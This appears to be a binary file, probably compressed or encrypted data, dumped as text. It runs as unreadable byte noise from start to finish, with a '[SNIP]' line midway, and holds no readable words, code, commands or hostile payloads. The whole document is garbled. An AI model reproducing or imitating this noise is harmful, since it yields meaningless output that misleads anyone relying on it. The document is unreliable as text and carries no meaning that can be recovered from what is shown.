KI..p,*.J,.}P......."a.u..U]..wL .kr.[35D{*$f..o.'h....2..j.*..[^4............`?C.[.G/....Ba.. :H.V...W8R.h..(..(%`4
:.!..a..Z"T5.^%Fs......_., .9i)[A.7~........9..x...L.h..<..:l.<.R.8p5...:.kQ2...O...AdM...dWu.%.#..
........|s<.&...q...c.....A..B."{U.=.z9.....0.]..I.....D3    q]...?R..QCr.    ..1..xR.....N
....E..^.EE.....Y.......$n.
[5.D.Z6.....>....s..    .h.9.]..d......^F.T......jn~.....z9.~s....i.e.i.L...z.6`.U4f..a...[.1..og.}... .3...h......A......h.....n.,-."....^..~..q....>..."..iP......62.H.x!    .i.H.I...x8A....... .+.W]|...............?h.,l1..............|.z..r.....xVx..w...EGz...M.#...yP...P....\..
..H....d.........r..4gf...J._{Km..z8.&P..~.9....5F....@1....t.D.....@}.a.d.v..J6...W...U.
:..W.w.L..@D+3.....MK......O.B......b.....U..a...YHX.......Qx...V]......j..H....@H...{......Z..Z..{...w!.n;..N!../8..p.I...x.Jnu...;
..f....j.;.H...|..?.<..t...C....x.u.g..d-.....w...P.R....Z...Z...E........}zm.......6.b..2}.x...,._.2..2b...
%......Y........b....u....6a.0F.....t.F.K.........5*u....,E...k
..-Ut..R=....:.k..c....].........h.Y.M.+...w......T(L.R
<A.G.[..{2u.8.
.Xu>..v.............=....ir...%J^..'k.-$.k7/1.uIB    No.K`.......$..,...7..$9".+.U...8..Y..&do..*..b.L5c....n....s..)c._e&0..q...=.s..P_..,6..4.M>..&.._S}........F.$..~D^x...8........A.h"....*.+B..I...r..g..ql.W...#.=+]
.q....Q..VD.w..F3.6.z.&..8j.v.&....O...u....#sB.P..r..p...^e..C....6.=..0.#."...tS.....}.-..1.......e.N..?p....l.[.:...]/............I....f.1...z>k.Pqg....,..wQ.b...z.....N8.g.E.3.}.A.}..).,...._......=..4..9k..J..    LVdh.:&........G...m.v...`Z[7Cl/..Ne.x..4d6Q.8.s....2.u.j..w.:.j......hh......N!...T...?.XcHeI^O..o):..
z...t.z......$;w.k.M.vz{.......xx...g$.....[.,.....A....{...`...%..l.9............(.W.....G?...\[n_E.d..`.&+~.F..G.3...3....Rn.#l..p`U..M..M.......fi8z.5..E........[K.<.'.......X..:)9..]...... .T.F...SK...I.m.E.......Ut..f..j.b.e....0z.}2.....GO.h%...Z.4"~...{8..u.y.Z.....Z`.0.5...\...W.W.2.0g?..4.y. ..kO.\..E.....".
'H..._...z..L$'{u...:[.1......_.U.{U..k.....".:...M4..'zL....53.{u.Oy.c    L}}!.U.d....4^.#......?{,Uw.C..1...O.K2.....K(.....?.    M.?0f........pv.gU....H7fH..d.vG..........U9.l..F...9..p\........dL=.Ei..m.m..f....)*..b.q.....k..%G.w.........    .+.0..c..|p...L.
..............t.T.......G....4...e...j..... ....Eu.....]....}..CY..^.VWQ..Z...;AT.g.2.WRHC...Q..;[..%kV...%pHe.U..\.O..'......AM:.;....9..s...f...T....i_.#T...X_"..z!xU..&.....U...o.    ....\....O..?.j2E.y...0.8.:91.....2..!......L.=..L...\.....9..v-...?N.N.F.J...&..3.=....)...<....6.y+./.h.=.ft.Bi..1..awhDPz.l...L...A.Sb.......v-.'....`.$oXm.m?0.....O...."...;O...<.Of.....]..C.|Lpt.~...
.31.....!..i...xSH...om...L1.......5~.c.    ........'Y..N~]....%`........#.XEVM*...|e......^e.\...K..........4.L.;m....#.86...Zs.q...Q...k.D<@&.}u....0u..'2c..D..0)..~CU*...zhs..s........%..f9.T
.VJb..N.5[...._.Z...-.......W......Rc...u...B.2n......9....`.`..).O!...lT.......z...u.1F..:...c....|=.S.........>n3z..NK...K><l...    *2O.Z3..=.4.j..........).CK...q...Nv?.........h...t..dG..m.;.9..V....l....lt-.O,..+*?......P.{O..."
.g......[W2r5x.~5..s..J.i>r.5..o...hy$T.r....gP....l..|...0...J.......K[.A...h\.?LF
..lP.5..T.u...|.@.D....D.u.*.7.......+m....
g2S.w.2\...G..`..{}.|.{}T..t] L.. ..l"..G9%8..T...........n.q....6j..4b.... y.nsM.....SQ".....~.D....G.....Xd.1......k6.B....TR:...7..4w..cfY.e...31'...8...l.M........F.3. T(...-.Zz..(..M.E..]_..    X...@_....%........nz......8N,.T.Z...p...k...$+.Jp.v...2...gkVV*.5.(S.l.....m.(D..i.............'.....Y....D.(.xY.......ju.m..Wg....?%...,"...U...9..=......-.*i.....\.\^l.gZU&..*...=...D.......4.h....:.H&..........(....*......U...~A.....[X..8c(t.C....=.n.l...~....'...e...0..h..-.mAX...~F...f-..LN.....,cz......`.....    ..-...$    !&p.e.........G...(.X[.K.I&m..O>../....s0.....h....tbW44d........V}t.R3..Q.n.......!4g3.qJw........B.o.i..O~...g8...5bR.
..@g...U(9    G.$t........k.2...-.?/-......3B............OxY...\....hH...K.q}EI..    .>.jG..(PR..VU.]3.........z.[.,......b.
..TH....
_.H.....x..>4..$i..x.k.L...0B._..#.u6M.;........]De..g..MO....bD..\.l`|......!....\}.I..r4.?...$.y....g...%..1.K.Z.Y.T.L.z..3......EWq.I..R=......z....up..f$..../"`.h`3(.*t..N....;.........X...-.W..M....S4..9!@..`.u.xnY...a.._.....*2...K.2!Xa..    .+B.#..........^FF..-J..^u-...z]G..Ry.O.!Ji.......s..*.%.O..&#6..W...)y.    ..H=)].
u.2w.j    .=.....0..k.....4.{....!../.0..=..Y.<.W..<.Dz..^hv......58...9x....Q........#.".+#rK...F.[.X..H.P..F[.N]p...\..j..H.~t2..Z4f... ..ki.k6S]B....7.....F-........`...    8......)............t.....T4=6C'O.....Z!....+~t.Dm?h...O&...@
...k..y....S.j.......    .........p.....@........w......bf~%....@..u.>P.....$.}..s._.{-6 i)%.q-....H@.    +..f7..0u.Tw.,....\.t`.......P...!..+d.sQJ....4..Y=F.Uh.....~.V..D.y9...m....H...5.}`...E16........8.'=...v.{c..,..+!Aq.~..#.    9M]4.... i`9.....:......,.".......o.6T.?O"J.`.V.. ..n..
....Ejl1(..L......y.*q.....    u..&.m..8c\..6...*.KnIHM..A.....|.....x.`....F>M...j.N.*/..).S...r....x"X*....0:......./.._..OZt.B.....FN2p@G[...z...H.5O.|..#....%....m..%..%!..;.?..K._.......D.ri.....$tR..$s.+..q.n...i..`..(+...A..._.. ........W...5.e....x......j.....m.0.7w...q..G.<Z.=+.=.Cn...+.f...^.`\...[...;-.-.....F.. ...    ........\X.T...l-.....5~..h.b.....i....&0.>mH..s.....i....."o.U})~..CpD...:B.}.E.A.....H....S.'...v3.c..{.ij$....0.X7...*.,....E~...hI_k..EG..g....H....z.6.S..-=I..h.%4."..L.n^>.......\J..............B9....j7j.fD*z..%.o1.....M...U..>..:P.]0W.K.......8.y\.9'.........@.|............6..w..A|..9.X... .....+.c.3. .V.BR?.T...{C...Q|..g>H.......8....Z...>...I|8../.....&.....3../{.A2..|'o....^g../...@.q.5M..3.6..............4L.......m..r...`...f..Vs..K.q...0...k./.{<...x:...\.g.l.....9),f..T9n..1.............M..XhZ..@A.`:$..t.h....4..............&D.....HF.".T.J.d._U?p....M.
+x..U...b0}..7.!W.....0YOnX...u......rDN_..+X.}DH....Cc................Q........n:C]......R.Z.BD.P.....s.<.[.oL..../.....T...G/...0..~>....."[.....I.....c...4...f..I.5]S+.....;ui.f..........u..A.=...../....=.....t..w......hz.?c.Z0...W.a..c.i.+..D..0"...[........LN...=.......l...C.7.,..t..y..>x..=...)...V/NB.dX...m.m.?.\@...b..........=R.k......w..=..G$S.__...p.S.....?e.:...y.......*=....,'...E.v....|.....$0...N..8.m...<}.?...|..8..V........."<e..b.....x0>N),N~i1.}.....`$.*.....9W.....A..w....... ..Mzk?E..S2..Mq.).....Q.#....q;..1x..X..$.fj[...        .L.+R?.x. .l..p.d..]F..+.....H........a%.;...OK.B9.q...!*..qJ.    .QI#>...    <zN.@..M....N;N...S.u.g..Q./..1!g!x0....y.t.0.<.W..y85.k.d..W...A..w......EG......^....`..9..().^...(g....zi..Q.>....WE8....V;..L.    ...z...
..].A..b.............?..."..=.1;t....h.....y.,....-/..5..+.:.a.....H.Lu..4p2....].._.b......Sw..E.\..E...|....|T..".o...'u.......niB6#....[    ..
...Av..s..{cS..W..A.s4....!..8.G..E...[.......>[.....z.........E..x......|........!!......4.f..hB.Vr8B3.3 ...l    ?....cpc.#...P.n........3-I...C.E.c.xh..F..<.W.r>h.)V...
.f..h....K..g?....,BVY.S.{.{G. .......i.|....qT....;....J...rROj.^....b*..4..............h.2)[.N0...Q2:.F.....xC]4....@.4....M..../".".....1.H.....<W.....N0..Eq....R#.....,..mB...~C8.....~.a.AF..'..8.4fX....svZ&d... '..H.....R.f,Vh.3..l.v.....Z..~..y.5g.!.s.R.h......]7.....2..p.e.[I.......R...H{2(0...%.g..|.....x..f...[d.<3G.O..qj..A...~...K.@D...r.#.k}...Jc.!.6'.    ......Ak. ....V>..w..E.k.....X..q....YV..4.pg...|.C..t;..lF<...Z.....F{.[.
..%.....?Hq.....e.|..U.|....-.?c..l....:.h...s.v@FAf\(....oW...J.lo%\.h#&.....|.....}..q.qR.../.K.......5.....~.E.c.cZ.l.]^4m+.....S    S...U..@..,.0.G.....K.......Q..l.....u,..f..].C.v@....].........+*..`d.'J.$J..X."..qad....
H..0...I..*M.D ...@...Q.%z..).......=iT..........~....{...........z"..........Q.s=......`.........I,...(~Q...X.{,T..T...5....H..j.4...&...&4.t~.....'C..%s...7 .b.H..v........r....e...%.....!]*..=...K...xCKSb@.~.Y.IlXd..D......`B.
..&_q....C..-..h?F....$t....T....m    VU.    ..,.-...Eo...H....e..5    ...M$...#.=..C.3.....p....-..U.xvHE......G.!....".D..ttv_F.,.|g.59...k.x....
...c>Qlz.-4!."...,k..3.....;Z..$..Ye^Y..-. ...h2y$.cW[_9.c..    s.?8....Z....UL\.0".z.G}........W=u
.wX_.k....LV....}x...x.$.... ,.W.{.zr.....:p.....!    ....ev..S".xr..v..;....B.4K..?.....Q........N(...].e..._.y.%........M......<.....E&._.....:.O.
...r;[..I.......8...!.K.......;,.7...0..:.q..;.9.h...@WmV~....Pd..|....\..Z...E..{.a...U..L$.....r.?y.c.G...f..8b.cA._...R...N    :.f.8e]..h.."......gGJz....!.....2Id...y>...bf...qfuw.5.......`..}._\...^e....)    2.....Q.wO..-......z\........w....`.N....S...e..>.1.oq=tu..L..F.9.q.....V.........w.
.d_B.......F...J..E...{j...bW....[.v.....nU..~.mt..yn...:    .,.S.{..<..s....6<.'Q....g[..;...U...n.....    ....Z... ...>Pn...,.%....Wf.+E...v.5.t..cTH........tZ.........G...l.7rW.;8%Vvu.w..J...m.b....*....=.....6I+...1X+.../.(h......:..1|.[Y"|.....EE..N.."C..#A.>..gPbf..+Y.64?w...>d3*\.ld...._.?...0...Vnq.Pf....$.$wp.....r..2..    ..T...Ph..c.m...@Z...S&e..<4....iMh....P.....q....[n...'J...!.q8@u{..n
.../\.....v.Z!.....H....4.~..
1...>.......U..c..........k.=`nn.t.u+.d.;..    .=.{..R.~hmY....C.%6..'...8Q....`>.....&}.P...3(a<4Z....=.mg?.\...6..;..G.?jJ)..z.CG.......c)...k........SZ.y\.......E.u....A.7.Z...W....pd....].].nT.5C..&..bB........I..%.K...xA|22Y.....g>_..5w...-.j6p...Bb....Xs...G...R.....6=.....1.....9MG~3.J..j.......!h...I,..Sl.....Kg.P.....U!.kTj.f3.Q*.|.Ka.6Fm.8.L.\...Q...X..Q\.......yZ...l.J._E#.O.    b.7.... S..K/N..rWx.=...S;3.!..@.q2p.;..R50...H.[.=....h..I.j.T.]..<....d..    Ii.8.....9,.JaW.G8.G.ac.....h?.........6.)`...G.,M.L.l...P".7..E.B..|..U.....3>k.v..<|tZ.jy+..M..P;..e.. 6.)..K.|.^..M.r.~................$...f.xLY.g..X..?C^c.4.>.    .m....;<5o1..(.....e.N..yE#M.<...].C..x.....Z.l...d...!...uhIm..H%....j.`:6..,{.J..N.....p...Z Z...E?.@.3C[.......Y`\ER..I....H......L.M79.z..Q...3.w@8Q8~!.!.B..SJ.._.BH...d..sFm....l1H..0..P....j.........@3.-sn.k..Y...k..rF~..R~...8...-....    .g...Y../..,..U../'-.^.$...XN..:..t........xUwfuJ......y@.....%.R...r....)..u......m%.[+rXdKv^g..^
.60&..&....oH...K-..@..........#..p..y..Z...........C...#R6...
.*..e.b......q.x....}C&......3p+mQj.34q]_..... ..S....j%.......s\f.....>.p.i.......]u..+4V|.W4Q.....gU....Z.^r..RFJ.Q.../......s.l.G..K.\.+rB.v.Ay_...x.P.v\...9.E.. .P_7.T....:........l.;cV.i....Hm.|>~1#.(.N....j..w..a.......S.Z..C..g...}..K.....o...v.....G......"...z|..|.y..........u.&Lb%H.N....,.W.`.!...NQ..b...S..}.......d...k].......!h..y[.b..>vw.....b!..KO.....I..~..:v....;..j......V...*......tdy..C...."O...!Y......2...p.bc,:.kQ..Ly......
Bg.Q/.9....+Sk........
.gK.....%....'.........as...TG..........T.>H..^zr..w8...
hg..>Tv.. ..aP...m.......+mR*.`Byn.Q%.LL.&.E.S}79.V....Z ....?..=hK....Q...;fP......8..`....A..t.lA.G..0...u..*`Vb....}...*.n.....V8X eC.Y..#. ...g..jDj.;o..&.M.W`?.*.H....l.`o...%..J.:.........sFb.PDy..P.?...K..&^.qZ......K...).ea.. ...JfI.">:.xCx..C...2....VY.._.H1........1....C<z..$...|(.^
. .*.>...8.f%G...b.K.FN..."J:.T..H.....    ..LK.[.W.\.3..c20..%"...........I..+........Zs8.._hX......V 3O.?.~
.i.Z..9.....Q08..E..u%. .J.i-.......PT...8...(....#`Q^,_..EL...~.._1H9.........-...> ..c..(.}..m...+c....q5.Sy.....=...v.s..b...y.L.Fj<......Q..H....%X@.|..}.@i.p....    .>..6\]...D.n...H.f}..,.....#P?.l.O,q.c.@d.X..a...O@.S.$../.#m..=Q..e.^..I6.R.....kX...T..HR$.f...-be7@.    ..F:0p.h.l...g.j..c...........o...3[.....z.KX....p.D..>..FX.b.Y.mn..i.k._;..o....!...>%T..(f.p0.i.C.@.7.e...zk........*...E.@gG....mI..J.4...t..$..............h...}.t.b.....:%rJl.B.....8...^...:%TKM0.Q.._.l....J(..    ,...i...3Q4....Y-n.\...>E/.....g..\.M...
....b.........oTU\.....
.../N:e(.K~\...$.....GR.h..6.Yt.g.JC...{^.........m&s.O..wu..`D...}.b&h.1.|H..9..yr.....m....+.....80.H..#.F.$A.*P.....6......$.}.k.C.Q...y....M.u..4vJ2L...Z!...z.........>,.....u...h.n....m.Q...    .)...I.!...E.Nb...-.iIZ....`|...$...~.Z.....6|.........8.r\TE...W..........9.E4.K...e..:....O./.}..h.S..    V...4P{.C....y\..?|...N.p..S..~....8(*.D.@.h..#R!.....&.rX
g...&.Ib.}...J.......+....S.D.a..~".2..<.E.B2.4c..9.........D....*....`..k.>.g./Y;g...oHzI*...l.c}...S...s.Q@o.I.vqj..m........TF .s<.........2.?..I-..#.091.....a...g.t....%C..$<..b...}...;.*.L:...1.[.H*.O!...Y.&.R.V.t...*..G.m..5..>."..p=zJR..bJ..R=d..Z............)......;.o.....o.....(...v..9N..vp...h.0.-...j....b.D...8.}1.....4.3....P...6g...[.z.E.....o.,.........P......N&.t..........O!....W...g..8j......f....z.5.p......T..#....6.7..-......eaO;...}{..J.AUK.C2{.....E....V.............I.&.bL.......A.J...V6..
R.T...fV...K..aa.r.(.&......NP.......I......sQ*.D..._...../} H    ..!N.`:.T....-.p..o:..s..-......Z.~..5.F.Y0..9a...Bm...._.T..yw^....o.F.:.M...e.....F.....$Ip...E...D....d.uh..W|..    ...m..}.....q
....a.....%fs}m.......f.E;?].c..\..A    ..C.>U.+X..{......(!.h.P...n..W.l(..Nj.`.=
J.;....:..|.e...t"...s..}...h.v.S.Cv.5....[n:..>..#...q.1...=...    .q......:.c....F.....o..{N..Ek^o..|f...l-ZI...a..3..XU(0.%..Y.l.s...-2....V...D4)....w....j.9.:C...m..;.*
.2..&..g...w..o.U.|...#@;j=....,,.....:63.N.!...3I..../1....j.+(=...ut....0}..q..E.2+..Z`=.1..}..E..".`..w..U&l.[...t>../..y...l.."P....s.U..n..v...(...7}..3.=...._....2z....$....(..;.yd_...X.2.7.........].$.........L..........G..*........|.......Dus.r.....f..cX..8Zb.......#t.....y....{.;.Z.Ua....*..Y..m......./iQ.....WRg.50<Z.K...]]...EU.T]M.c..2.Mz\.......(#.%p....L.
*.A)..hG..f.....=.....HlCI.K.G.A..........H.......!...&ey!6y..'.2_..,..YH.....    ..F.(.i.....p.awi...$^..tp...1`9...k...?.&.x.h...(.J..:..!.3.J...>..Mw...5v.P....>....{..S.N    .d./.xGG...U&.......N....#.B..>./.9jf ..obs.6..SC........'.My.w..a2Q..X.yC}N.....6.A.>uK.WwU#...zc...Y,.75....S..xYT5s.~$.!$=.[~(..}1,........p.]..f......&....>.!.q..@..L.X!.k.%).y.<.Te..z...(.]N...T..8.i    .A..|..".z...O....Y    ..i..~.Lwk.).....R..R3[    ..g^I0......T...B.^X....w.q.H...5..X~9.....
..;..q..h.&.4..._Q.X.......'..Bi.......g%..7.T...y...+cA......0....4....($.d.    .~eB. ......o5.F.;..%.H....+...a....bd,So.....8N..Y.d6.'H..w.c....%.]...Y...Q..Se.;.0&
.t....9..j.b....vE.T.)..
.~.F..e6o..9j...*...Ab.A.R]J......r.S.u..r3.....[....P.}%.!'1..2...*6c-7....'.y........m.....A .....V....Y.Q......)........a.......r7K.7Ta....jks.E..D..).&.....r...]}..L...($..?.$Ob....J.G..........7.....b.....z~...3Vn......N.&.J.....)
.<..W...k|...?.9..P6...._>...j>I......Q,...........4..<>>..k..>L.N.....(.&.M.$T]...[^......;LP.P1U..P.Kz..xu..7..N.}.%g....T...O.$.......YQ...2.3..w.v...f;...^.!....KX.J}P....B]f..0    J........8.H.!.J.0...zXe&d
.r........
..K\zR...c+)..5j.8.L.T.U+0..J?...vr....._.....:0l.|t.....5."o+.ci...62.<@....8..'46v.3)..\I.j.$.1.I....t.6Dkf_.Zn.,...ye.    Q.....,....9....~..z.....U..Y.....C'H....M...|.?....o.I...-....0..z.....JOd.<-.Px|....V..u.c6>..c.T.|..@..5.~..b.E.5.D.....^H..t..    .1.|.....0...M..n..`..q3..w.&.S...8T...9....2..[....|.i....9.....C.K....f......,Q],.sFUI_:.E..........%.....}+...(..~...L.....7..).......\e.C@TP..s2k`.:_x.].p......G8.E....7H...X.&.....K<..1.u...O......!r|...W..!c<_F.=..#.......[..+^.9.B.u@w@...l.......!.;_..Dy.5.....Lx.5...q.=...6.......`....C...K#gW..:"....S.R.3.....\*@.....q....v....A.|[1>...|.'].....p..'.6...Q...... ,.R.%.1Z.9^..t1....E.(.J...+.s...........St.2^8.TC.N........K.......B.c...s.].QL,..n...5b.5M.k.........:A.=...(.v..)..w)[.wW.o,y.o.7$M0.."..M.61*..,.......7..T...6..!.-...C.H.>..8k#.....D.-..D..Fv....Z\CR..Im.....&....5...).FE..|..`....../.7..O
Oz.....W.*...2.......f.2U..~k....epa...%...|...zV..
q......#02!v.........._..E..ue.....Vr....v.I...?.G........>I.y...wm..@.......T..x`...*.2y...!v.}3......
.......P..#<.\..F.....k...7_@........
sI.4n...Z_..TVn^5.-..n+...............c.z.....;........9........a.T..!...-..|)    .w....0..s@......H.`.UK.:U^..<|r..me&..%.B...tr.e.8.~S.....s..'I......,.T./...j...).t%+....(.C.....N.*H.... .,.&...4.Q.uk...6~].&..Fa..D...y......WX.......n.m...>5.....D..J.9......w......sR9:.#...{..;..YAs..X......kEt.t..a....n..u`...&.A^..kd\7..p....0@Z.2.......^.9...~........*..O.H.I.|.....^t....S.V.{.......].+.\.O..gSD.T.0CD....:-..w...A_h...{..9Z+<..=.=..._..Gr..CrG...sd.K.<n. 8...i...Rd..X#D...Mv..5b.g..n.......h....t5........&..t..7.=....f`..s..<.U.#..{..w.0e..E.K5.-....\.=~Wj.|.L.RR.....e.......'    ..-..<.p.u..|.hk..Qe..t~,..........H.F..=.....kq..XB. ..<."q...;....;n...$....    .+.'Y:im........;..|.+4...........[............j..eo.a......=.;...6..nW..t-:...x.._~b...........W..z.*]T`4.....o........T.|/...z}n..Ek..).W.w..o.eciQM!..8*.....R/...........uK..*N........H....|N.P$^..2%t^..d...O.7I......CWy
..nU`..Kd+w...    ...wy...+A1.......a....+..:...6'.&.7n......HK:~7.R|{..ir.SV=..n.\.h8...F..J...1..=.<*..B.k..)..Qq.7....X8i..5..ZZo....CW..D.....5._.Dg.<8...*$...B....S.....b....`.*.......^y.....C..W...9.]e..........;.'.S&.=.D}<|...$'...D.u/.;o..".n....=...$9?>.....k.}.|..v..pS..}|..........p.....I..I...{.]...L..K.....T...C..P}.......<..6...>
...[SNIP]...
...H+..*.    9.$...-..].%mD....0D.6.5.......D..b......\.+y..2.../.;.%......:    .Z.f...J.....7.q..-.h......J....hQ....H.I(.>.........&.."k..k..r
...|...t..].....4sW(.w.C.My....O--7.......'H..)H.>....k@.....4<?....|ovZ.M.jl....-..@.0.......>B.C(.CC....."!..EbW...Q...0>K.(.....l..(,....0#.@S\....s...I..<.)...E.d.ge...u.v..(vtv!...B@..'z_#.`u..Y. .:......h..C..!q..K.......U..... ....jN.8%<e..U._$.96...>@.89<i./G;....T..Z`..e....F#.c.@.....D.....tU..<.......u.?Yvm..1..g..z.lyj.].dFo.G[`.r..R3>=..},y....@6..g....j..(
..2.j.ON..P..e./..z.#.......;..n.tR..L.Ja..z.:M....)...>...=6.>y.....3.T..Fn.l...[..~*.#.y....9..q.._y....8..6./M.q.!LO.1..2Q.p.    k...kZ..s.D...].....M..]p..g!...lY...K]..DpD.!hW5.&.......xTl..S....>..!..`....n!.*......)Y<..'.$.z.>.k`..k........6.c....C.y.....U.Gz...cX..=|.Z...@(......[.......q    .[.......i
...%..?..t.:.
.?..$..<..Z.)..p.vW&.....9.@..
.........F9..) ..]....h5.......a5cG....G....\. l0."k.Ru....*._9O
i*.R..K......cZ..-
....x..sJ.)}J]x<.........z8.r..?...d0`Hy...K......x..o..0._.CB.....Z#,.(..h...@...E1....\.{...^......9.b..sA.f..1k....;.......r.I..w+.+=..:..y......x.r.S)u.Fu...>..]....;!2.......6W...o..O...kQ..:....    ..t.._U.a..[]!    4...A.)/:RV{..u1...f.W/.4.1K.A..3...).7    ...'o(C...'X..c.l..z1JNN..h....n.tV.>.O..e
E.MX...v.....}.7...u.}.
.4A.t-..V.....(C..;....:FK.uB...'...D.hB&C...i2.K.Z....J...4.".&.?*.........I.L'....o..7.
p......&7.j..~K4..K..2n.}iU.._a.DO.h]......v..fn.E.....u.~{AD.0D...I.R....+..@0]}U.E....E..x?!!q.P...mtF.6.x....=@.[........]....9.8u).A.C.-B.`.w.+.....Rs.n....N.cv.W1.....".k....*r^....77wi%...:......e.. -.r.....!.^B...x.Z..Z...S.>.yg#]].BY .<$)>......!...Z......I....mg...>.kL4..jKV2..F.f'M
...n2u..CQ?..    ..k.l...m&..!\..g...: ....N..%.k.q..H...iE|.....$...c<f.....r...{._Sg..M.....^.m..9...u..-R^-.....G[... .....{....?Iy..4v\"J..............\x..4W.v~oN.....&."j..Z.4g.42U.....jHA|.c#y>0eC..H....A.<..PF. ...?..m&B.G......tPz.y..!....1v.....4.....;:f. >....>..;.VJd./63h;...........O..% x0.J.........iVB.W*.g.<..@S..].0.    .Y.&.a[.H....|....'9.j5..rr..o..........D.:..........r...V.t.o;...H.Z....tv7..9..$....E..k..Q.Sv...$.@[sw..1?j..............y.=...LV.A@../.5.0I6./...., L......w.......1...C.....).L.'>...T.%YZ..../:Y..U=6A..:y.;.w..*.......{........ 3.GC.N=.F>d.....t.g6c...Mt..H.Z...1.=....6.(.h>.X..9.~6../....9.6.N.s.2p..X.>....).J."......j.i.5Z... KQ...8.W.S..i^G........gA...#T.0y3.P...:Z.{....6...LS.X....iN+.....p..|...;.i.y96.[.=d...jA...z..,..4.x.w..=M.WO.....bbS....%r.S...E.....uN..[H.B......'N.....|...(R.g.)...}rT5.v.f..j...Vv...........Xm..IV.[r....t.&Q..8......Kc..,<Q+l.u..s...n|d+..L_....(.........c.#C.s.:.....@Gi$C\.;].tr..<.e.....N...>..d.s..&."_.......D.)....D..'..F>.,C..W.3@.t..-..Ot..>./.[..=..4....E..]W....b.,.|^.p|.............*..5Y...d..N...F.....H%...k..`Scfv.E\7..3.fR.J.;.....z..f...xEe`......}.....hu..')..zv..r=....ZW..<...=.*;.(....#r.c..5*,.F.........p....#...o.nS4?...............}...e...V.`@E(c...9....c-.J.z...6E6r.{.0a.I.H....L.'.(......m.[.|....8...hN....}&.7X......'?......4.t."....Q........t."..E... ..XZ...Z..O..n........y_R....P..4...Y.F.N..sJ.2|..8....i.@.%.b.%+%..d.o...V.8j.@.._....g.s..7V.6.~~...7.>...<.....p.fg%.e.r..g.XvL.E.JV(>u+".    ..5.&..?d!t..7.F7i.dy.........X...*..g........J....`l.l...I.j.Z*N..`x.&5.|.+....,.%..)7......I..    ;.........WD5.mk/J....C.*...p.P..W`.Da....^.Vi?j.....'......R7..r..t.?.~GVo....O\.jR.g..A....8...kk*....k4....t.@... e=.S6.A5Y...<.....'5+.+.s.s5.._.(>..
.uO..
.=...?..z7".*....B.{...e..>eB.......I.....8..`R.@.......@.....3..6A.....e..    .<
.8&..k._....No..gS......B....N...A.-.....\l....O.6..Fq.....;Rx5[t.:....fW....v..m....>.w...jm%F:..r... ..1H...Y...8*..T........M...c p,.....e.ohL.6'.y....p....Qw....s.yK....H...Q.......V(c0...<..%.'#...u..*./u0...9Er...G...\.!..C.H_...7.......[..@.......8.....K.K]..f."Pw..T...x..UT..aH...vC.!J...eO.....    5q..Ew<i.A....a.n......f.4..\.m3\W..E.X.\.YH..7..v..j..~....../..>...'F....$6 ..=...=..... ..e....D.........I....D.QedI.=.F.S..z?#.....v.....Sq..b....I ..8...'.}.B..P?.....:5.N}J..~......BnK<{...\.B..bR.,..D.C&..',..u&.\.....b,C.[.....5.......!.VYW>A..K*.5{*7.}.VO.K[z..A.3w}..v.[......    .....h.#    ~..*.z.O.^.....4,..[.b...0....V.p+.........a..4/H...pE....{BH4..\.....2.~.
.%."...UM.<.......s.V$N..RJ.. .X....T..Q.L.*...$G...E.R..
^....t.Q.6t1.*......~......f...>.9.>....-3.PU.8.....Sn...[.....`./>A.{.C7J(T...~2;C..)*...)\.:,...h...C.1\..Z(G.6<...2.7..No.,p..E.......uj..<thX..r.ip.F."..E...&c,..?.q..t....t.([a......{.|.^(..........&..Lg.x. b.|..A1...\P...|.w.h.....l....=.( t.IYA.)h.W........[G...G.....l...K.(....;H.YG.:...i......=0|.......9....Wq.cAj.}.Q..j.t..B..\....... .+.c.....A..].d.h<.ED!O_..O.Jo......b..........mHR3..}..g|...HEG,..q..a.O..b.......&.T|..5.q.&2.)......x3.I..+....z..[.kn...K...dD.B..@..tR`....^.a....i3....|...$l.2.H.......}.....
.0..G.#...G....s(.b.._.}.wj.U........o...sO...h.R:...*n...^....B.0|..}.)
.(.....&M.f{..W.=.k.3j.lkF8H.c8q....NP`.bYz..T..w.......I..Tct{......ls...$...V.....UVd.o.f.o1j..w....xb....S...8...;z..D'.u3...    Q_.."..X......o    ...Q.U........x7.....[.P....P.o.&v2V[..6T......D..R...ex...C...,.q.lZB{...p.K..~...r..%R.:.y.....\|...AWii.u......_...K.z.&..}.|.n.....m........'..Yt'2.wA..y..q.o3...w\1.w{....>..
;...@...Na..[.k.....L..vZ.......7-.4.......bv...... 9.. .Z...{.<J.z..!c.V...Z.sx.1.}..I.B..Tc..}..t.........oq#].f......Y...E....d....Zf..(..V..xb*../.._G..a.H..Z./.......b v~..,...g.l.*...........X;`W...lZ..N6UcN.Cb| G.o.*..z....gg.\......\F..+x..zC.........~o<..N.
5.z...O..S.JP.].m8.a......t...1..b..C.aX..]Ze.:.Y,....p.83Z..C..W.D.$..HA.}'...R."-=.V.Pl.......S...o,v7..Q._....B.E.N.....axQ<Zca`...J.....h.`m.8.>.>.@}.e.....q.A.....H........)..;G`..aB9..N.......+...-.M..o..._A.........M.....F......7V..A.....0....<.yn...Bd$..,...l..;(.+.C...V..u.C..}./K9rz.n#..N.z|.:.8&.Ph....P+.k..T......B.A@..~.1{.l<-..!....|.3..m.+.o.l ..s...a.....TA...hag....!....[.E..L...UC......H.......D..    1.%_..d.L..V....O...L.x\dqQ.......P.<.. i.S^.qsT.V......M
.......b.xL....d.f.    ...O7..^I....(S...cb......,9..^..Ip..pus.2..(|u..._..M....t..5../uj.guo.&....{&...r.....#.T^7..6......"I ...ja..;._.6...^.k:=>\.p.4....q
l+.....    .$.h6.....[....m....+.U.dTgd"...X..4..J:...&.{.3......[".*.y?.;..k]..7..t.d.rd'W..r].D......kV.A..V.'..)f..4.*..._m%
.....2,DP.~..v...u'.......|.R......P.....};...p"T;j.;.9.g{^.W>TV..Fq..........MB *.~.IFO.....q..y..;T...0...LH.b..'.'.m.g....P.k..W...P..Z...)c...6U....<.@..v.Ur.........f...w.....8G..gs..90.h..w.!I]......8_.:c. .P.....Mw.%.n.....X.u...9.......K8yJ....;...M#....U...t..*..c....J.....(..%...K....{1.>l.K..q.I..I....1.5....+'=.wBO{.....K<.A#-.....a.+.jf.:.....y.#.,.X..K..g...k........v.M..B>..d.    Q~......`X..Ty?x.~.w......\}.{C*......q...E...n...../N!i. ..KC?...7D......b.....B..)l......Gy...+.l.;.. ....i    ...x...j.=".:s.Tc.X.l|.O-...)U>....16...F..d..:-......1`j..5.-4=..!....$X<.:....h|.b.......zrc.XS..d.TX......M"Fw!.N.l$....\S..Ko...    ..Zx*O..z9fB.....x......9'.
